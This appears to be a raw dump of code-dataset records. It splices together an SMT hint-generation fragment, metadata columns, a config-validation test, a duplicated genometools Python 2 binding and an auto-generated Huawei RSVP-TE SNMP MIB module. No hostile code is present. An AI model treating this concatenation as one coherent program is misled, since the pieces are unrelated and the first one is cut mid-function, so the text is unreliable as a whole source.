x_s_msg_id = symb_to_next(mgr, s_msg_id)
x_s_timeout = symb_to_next(mgr, s_timeout)
x_s_c = symb_to_next(mgr, s_c)
x_r_l = symb_to_next(mgr, r_l)
res = []
r0 = mgr.Real(0)
r1 = mgr.Real(1)
i0 = mgr.Int(0)
i1 = mgr.Int(1)
loc0 = Location(env, mgr.Equals(delta, r0))
loc0.set_progress(0, mgr.Equals(x_delta, r0))
hint = Hint("h_delta0", env, frozenset([delta]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.Equals(s2r, i0))
loc0.set_progress(0, mgr.Equals(x_s2r, i0))
hint = Hint("h_s2r0", env, frozenset([s2r]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, s_evt)
loc0.set_progress(0, x_s_evt)
hint = Hint("h_s_evt0", env, frozenset([s_evt]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.Equals(s_msg_id, i0))
loc0.set_progress(0, mgr.Equals(x_s_msg_id, i0))
hint = Hint("h_s_msg_id0", env, frozenset([s_msg_id]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.Equals(s_c, r0))
loc0.set_progress(0, mgr.Equals(x_s_c, r0))
hint = Hint("h_s_c0", env, frozenset([s_c]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, r_l)
loc0.set_progress(0, x_r_l)
hint = Hint("h_r_l0", env, frozenset([r_l]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(s2r, i0))
loc0.set_progress(0, mgr.Equals(x_s2r, i1))
hint = Hint("h_s2r1", env, frozenset([s2r]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(r2s, i0))
loc0.set_progress(0, mgr.Equals(x_r2s, i1))
hint = Hint("h_r2s1", env, frozenset([r2s]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, s_l)
loc0.set_progress(1, mgr.Not(x_s_l))
loc1 = Location(env, mgr.Not(s_l))
loc1.set_progress(0, x_s_l)
hint = Hint("h_s_l1", env, frozenset([s_l]), symbs)
hint.set_locs([loc0, loc1])
res.append(hint)
loc0 = Location(env, s_evt)
loc0.set_progress(1, mgr.Not(x_s_evt))
loc1 = Location(env, mgr.Not(s_evt))
loc1.set_progress(0, x_s_evt)
hint = Hint("h_s_evt1", env, frozenset([s_evt]), symbs)
hint.set_locs([loc0, loc1])
res.append(hint)
loc0 = Location(env, mgr.GE(s_msg_id, i0))
loc0.set_progress(0, mgr.Equals(x_s_msg_id, mgr.Plus(s_msg_id, i1)))
hint = Hint("h_s_msg_id1", env, frozenset([s_msg_id]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(s_timeout, r0))
loc0.set_progress(0, mgr.Equals(x_s_timeout, mgr.Plus(s_timeout, r1)))
hint = Hint("h_s_timeout1", env, frozenset([s_timeout]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, r_l)
loc0.set_progress(1, mgr.Not(x_r_l))
loc1 = Location(env, mgr.Not(r_l))
loc1.set_progress(0, x_r_l)
hint = Hint("h_r_l1", env, frozenset([r_l]), symbs)
hint.set_locs([loc0, loc1])
res.append(hint)
loc0 = Location(env, mgr.GE(delta, r0))
loc0.set_progress(0, mgr.Equals(x_delta, mgr.Plus(delta, r1)))
hint = Hint("h_delta2", env, frozenset([delta]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(s2r, i0))
loc0.set_progress(0, mgr.Equals(x_s2r, mgr.Plus(s2r, i1)))
hint = Hint("h_s2r2", env, frozenset([s2r]), symbs)
hint.set_locs([loc0])
res.append(hint)
return frozenset(res)
| true
| true
|
790da3fb01143d681327600c538468b2c14e75f6
| 392
|
py
|
Python
|
test_validate_input_file.py
|
cszelesbbs/servicecatalogenabler2
|
f3ece5e49f047b45e796a7656816d7603877ec70
|
[
"Apache-2.0"
] | null | null | null |
test_validate_input_file.py
|
cszelesbbs/servicecatalogenabler2
|
f3ece5e49f047b45e796a7656816d7603877ec70
|
[
"Apache-2.0"
] | null | null | null |
test_validate_input_file.py
|
cszelesbbs/servicecatalogenabler2
|
f3ece5e49f047b45e796a7656816d7603877ec70
|
[
"Apache-2.0"
] | null | null | null |
import json
import yaml
from jsonschema import validate
import os
configuration_file = os.environ['SC_ENABLER_CONF']
with open(configuration_file, 'r') as conf_file:
input_config = yaml.safe_load(conf_file)
with open("./input_schema_validator.json", 'r') as schema_file:
schema = json.load(schema_file)
def test_input_params():
validate(instance=input_config, schema=schema)
| 23.058824
| 63
| 0.772959
|
import json
import yaml
from jsonschema import validate
import os
configuration_file = os.environ['SC_ENABLER_CONF']
with open(configuration_file, 'r') as conf_file:
input_config = yaml.safe_load(conf_file)
with open("./input_schema_validator.json", 'r') as schema_file:
schema = json.load(schema_file)
def test_input_params():
validate(instance=input_config, schema=schema)
| true
| true
|
790da45c9689d6ffd0b636d581f5ce7ab96fe34b
| 3,532
|
py
|
Python
|
gtpython/gt/annotationsketch/image_info.py
|
ggonnella/genometools
|
48103b35c99920179fae697086efdf6d0548a1fe
|
[
"BSD-2-Clause"
] | 1
|
2020-02-19T14:10:38.000Z
|
2020-02-19T14:10:38.000Z
|
gtpython/gt/annotationsketch/image_info.py
|
ggonnella/genometools
|
48103b35c99920179fae697086efdf6d0548a1fe
|
[
"BSD-2-Clause"
] | null | null | null |
gtpython/gt/annotationsketch/image_info.py
|
ggonnella/genometools
|
48103b35c99920179fae697086efdf6d0548a1fe
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014 Daniel Standage <daniel.standage@gmail.com>
# Copyright (c) 2008 Sascha Steinbiss <steinbiss@zbh.uni-hamburg.de>
# Copyright (c) 2008 Center for Bioinformatics, University of Hamburg
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
from gt.dlload import gtlib
from gt.annotationsketch.rec_map import RecMap
import math
class ImageInfo:
def __init__(self):
self.ii = gtlib.gt_image_info_new()
self._as_parameter_ = self.ii
self.hotspots = None
def __del__(self):
try:
gtlib.gt_image_info_delete(self.ii)
except AttributeError:
pass
def from_param(cls, obj):
if not (isinstance(obj, ImageInfo) or obj == None):
raise TypeError, "argument must be an ImageInfo"
if obj == None:
return None
return obj._as_parameter_
from_param = classmethod(from_param)
def get_height(self):
return gtlib.gt_image_info_get_height(self.ii)
def num_of_rec_maps(self):
return gtlib.gt_image_info_num_of_rec_maps(self.ii)
def compare_hotspots(cls, hs1, hs2):
if hs1[2] - hs1[0] + 1 > hs2[2] - hs2[0] + 1:
return 1
elif hs1[2] - hs1[0] + 1 == hs2[2] - hs2[0] + 1:
if hs1[3] > hs2[3]:
return 1
elif hs1[3] == hs2[3]:
return 0
else:
return -1
else:
return -1
compare_hotspots = classmethod(compare_hotspots)
def each_hotspot(self):
if not self.hotspots:
self.hotspots = []
for i in range(self.num_of_rec_maps()):
rm = RecMap(gtlib.gt_image_info_get_rec_map(self.ii, i))
self.hotspots.append([math.floor(rm.get_northwest_x()),
math.floor(rm.get_northwest_y()), math.floor(rm.get_southeast_x()),
math.floor(rm.get_southeast_y()), rm.get_genome_feature()])
self.hotspots.sort(ImageInfo.compare_hotspots)
for hs in self.hotspots:
yield (hs[0], hs[1], hs[2], hs[3], hs[4])
def register(cls, gtlib):
from ctypes import c_void_p, c_ulong, c_uint
gtlib.gt_image_info_delete.restype = None
gtlib.gt_image_info_delete.argtypes = [c_void_p]
gtlib.gt_image_info_get_rec_map.restype = c_void_p
gtlib.gt_image_info_get_rec_map.argtypes = [c_void_p, c_ulong]
gtlib.gt_image_info_num_of_rec_maps.restype = c_ulong
gtlib.gt_image_info_num_of_rec_maps.argtypes = [c_void_p]
gtlib.gt_image_info_get_height.restype = c_uint
gtlib.gt_image_info_get_height.argtypes = [c_void_p]
gtlib.gt_image_info_new.restype = c_void_p
gtlib.gt_image_info_new.argtypes = []
register = classmethod(register)
| 37.178947
| 91
| 0.656569
|
from gt.dlload import gtlib
from gt.annotationsketch.rec_map import RecMap
import math
class ImageInfo:
def __init__(self):
self.ii = gtlib.gt_image_info_new()
self._as_parameter_ = self.ii
self.hotspots = None
def __del__(self):
try:
gtlib.gt_image_info_delete(self.ii)
except AttributeError:
pass
def from_param(cls, obj):
if not (isinstance(obj, ImageInfo) or obj == None):
raise TypeError, "argument must be an ImageInfo"
if obj == None:
return None
return obj._as_parameter_
from_param = classmethod(from_param)
def get_height(self):
return gtlib.gt_image_info_get_height(self.ii)
def num_of_rec_maps(self):
return gtlib.gt_image_info_num_of_rec_maps(self.ii)
def compare_hotspots(cls, hs1, hs2):
if hs1[2] - hs1[0] + 1 > hs2[2] - hs2[0] + 1:
return 1
elif hs1[2] - hs1[0] + 1 == hs2[2] - hs2[0] + 1:
if hs1[3] > hs2[3]:
return 1
elif hs1[3] == hs2[3]:
return 0
else:
return -1
else:
return -1
compare_hotspots = classmethod(compare_hotspots)
def each_hotspot(self):
if not self.hotspots:
self.hotspots = []
for i in range(self.num_of_rec_maps()):
rm = RecMap(gtlib.gt_image_info_get_rec_map(self.ii, i))
self.hotspots.append([math.floor(rm.get_northwest_x()),
math.floor(rm.get_northwest_y()), math.floor(rm.get_southeast_x()),
math.floor(rm.get_southeast_y()), rm.get_genome_feature()])
self.hotspots.sort(ImageInfo.compare_hotspots)
for hs in self.hotspots:
yield (hs[0], hs[1], hs[2], hs[3], hs[4])
def register(cls, gtlib):
from ctypes import c_void_p, c_ulong, c_uint
gtlib.gt_image_info_delete.restype = None
gtlib.gt_image_info_delete.argtypes = [c_void_p]
gtlib.gt_image_info_get_rec_map.restype = c_void_p
gtlib.gt_image_info_get_rec_map.argtypes = [c_void_p, c_ulong]
gtlib.gt_image_info_num_of_rec_maps.restype = c_ulong
gtlib.gt_image_info_num_of_rec_maps.argtypes = [c_void_p]
gtlib.gt_image_info_get_height.restype = c_uint
gtlib.gt_image_info_get_height.argtypes = [c_void_p]
gtlib.gt_image_info_new.restype = c_void_p
gtlib.gt_image_info_new.argtypes = []
register = classmethod(register)
| false
| true
|
790da6152f12e012efa9bdc9399809ed616980f1
| 77,846
|
py
|
Python
|
pysnmp/HUAWEI-RSVPTE-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 11
|
2021-02-02T16:27:16.000Z
|
2021-08-31T06:22:49.000Z
|
pysnmp/HUAWEI-RSVPTE-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 75
|
2021-02-24T17:30:31.000Z
|
2021-12-08T00:01:18.000Z
|
pysnmp/HUAWEI-RSVPTE-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module HUAWEI-RSVPTE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/HUAWEI-RSVPTE-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:36:34 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsUnion")
hwDatacomm, = mibBuilder.importSymbols("HUAWEI-MIB", "hwDatacomm")
ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex")
BitRate, MessageSize, QosService, BurstSize, SessionType = mibBuilder.importSymbols("INTEGRATED-SERVICES-MIB", "BitRate", "MessageSize", "QosService", "BurstSize", "SessionType")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
Integer32, Unsigned32, MibIdentifier, Counter64, Counter32, TimeTicks, IpAddress, ModuleIdentity, iso, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, ObjectIdentity, NotificationType, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "Unsigned32", "MibIdentifier", "Counter64", "Counter32", "TimeTicks", "IpAddress", "ModuleIdentity", "iso", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ObjectIdentity", "NotificationType", "Bits")
DisplayString, TruthValue, TimeStamp, TimeInterval, TextualConvention, RowStatus = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TruthValue", "TimeStamp", "TimeInterval", "TextualConvention", "RowStatus")
hwRsvpTe = ModuleIdentity((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148))
hwRsvpTe.setRevisions(('2014-10-25 17:36', '2014-06-16 14:55', '2013-08-28 17:55',))
if mibBuilder.loadTexts: hwRsvpTe.setLastUpdated('201410251736Z')
if mibBuilder.loadTexts: hwRsvpTe.setOrganization('Huawei Technologies Co.,Ltd.')
hwRsvpTeObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1))
hwRsvpTeSessionTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1), )
if mibBuilder.loadTexts: hwRsvpTeSessionTable.setStatus('current')
hwRsvpTeSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"))
if mibBuilder.loadTexts: hwRsvpTeSessionEntry.setStatus('current')
hwRsvpTeSessionNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeSessionNumber.setStatus('current')
hwRsvpTeSessionType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionType.setStatus('current')
hwRsvpTeSessionDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionDestAddr.setStatus('current')
hwRsvpTeSessionDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionDestAddrLength.setStatus('current')
hwRsvpTeSessionSenders = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionSenders.setStatus('current')
hwRsvpTeSessionReceivers = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 6), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionReceivers.setStatus('current')
hwRsvpTeSessionRequests = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionRequests.setStatus('current')
hwRsvpTeSessionTunnelId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionTunnelId.setStatus('current')
hwRsvpTeSessionTunnelExtId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 9), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionTunnelExtId.setStatus('current')
hwRsvpTeSessionLspsNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionLspsNumber.setStatus('current')
hwRsvpTeSessionStyle = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(10, 17, 18))).clone(namedValues=NamedValues(("ff", 10), ("wf", 17), ("se", 18)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionStyle.setStatus('current')
hwRsvpTeSenderTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2), )
if mibBuilder.loadTexts: hwRsvpTeSenderTable.setStatus('current')
hwRsvpTeSenderEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderNumber"))
if mibBuilder.loadTexts: hwRsvpTeSenderEntry.setStatus('current')
hwRsvpTeSenderNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeSenderNumber.setStatus('current')
hwRsvpTeSenderType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderType.setStatus('current')
hwRsvpTeSenderDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderDestAddr.setStatus('current')
hwRsvpTeSenderAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAddr.setStatus('current')
hwRsvpTeSenderDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderDestAddrLength.setStatus('current')
hwRsvpTeSenderAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAddrLength.setStatus('current')
hwRsvpTeSenderHopAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderHopAddr.setStatus('current')
hwRsvpTeSenderHopLih = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderHopLih.setStatus('current')
hwRsvpTeSenderInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderInterface.setStatus('current')
hwRsvpTeSenderTSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 10), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecRate.setStatus('current')
hwRsvpTeSenderTSpecPeakRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 11), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecPeakRate.setStatus('current')
hwRsvpTeSenderTSpecBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 12), BurstSize()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecBurst.setStatus('current')
hwRsvpTeSenderTSpecMinTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 13), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecMinTu.setStatus('current')
hwRsvpTeSenderTSpecMaxTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 14), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecMaxTu.setStatus('current')
hwRsvpTeSenderInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderInterval.setStatus('current')
hwRsvpTeSenderRsvpHop = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderRsvpHop.setStatus('current')
hwRsvpTeSenderPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 17), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65532))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderPolicy.setStatus('current')
hwRsvpTeSenderAdspecBreak = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 18), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecBreak.setStatus('current')
hwRsvpTeSenderAdspecHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecHopCount.setStatus('current')
hwRsvpTeSenderAdspecPathBw = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 20), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecPathBw.setStatus('current')
hwRsvpTeSenderAdspecMinLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 21), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecMinLatency.setStatus('current')
hwRsvpTeSenderAdspecMtu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 22), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecMtu.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedSvc = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 23), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedSvc.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedBreak = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 24), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedBreak.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedCtot = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 25), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedCtot.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedDtot = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 26), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedDtot.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedCsum = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 27), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedCsum.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedDsum = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 28), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedDsum.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 29), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedHopCount.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedPathBw = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 30), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedPathBw.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedMinLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 31), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedMinLatency.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedMtu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 32), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedMtu.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadSvc = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 33), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadSvc.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadBreak = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 34), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadBreak.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 35), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadHopCount.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadPathBw = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 36), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadPathBw.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadMinLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 37), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadMinLatency.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadMtu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 38), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadMtu.setStatus('current')
hwRsvpTeSenderTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 39), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTtl.setStatus('current')
hwRsvpTeLspId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 40), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeLspId.setStatus('current')
hwRsvpTeSenderMsgIdSndFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 41), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdSndFlag.setStatus('current')
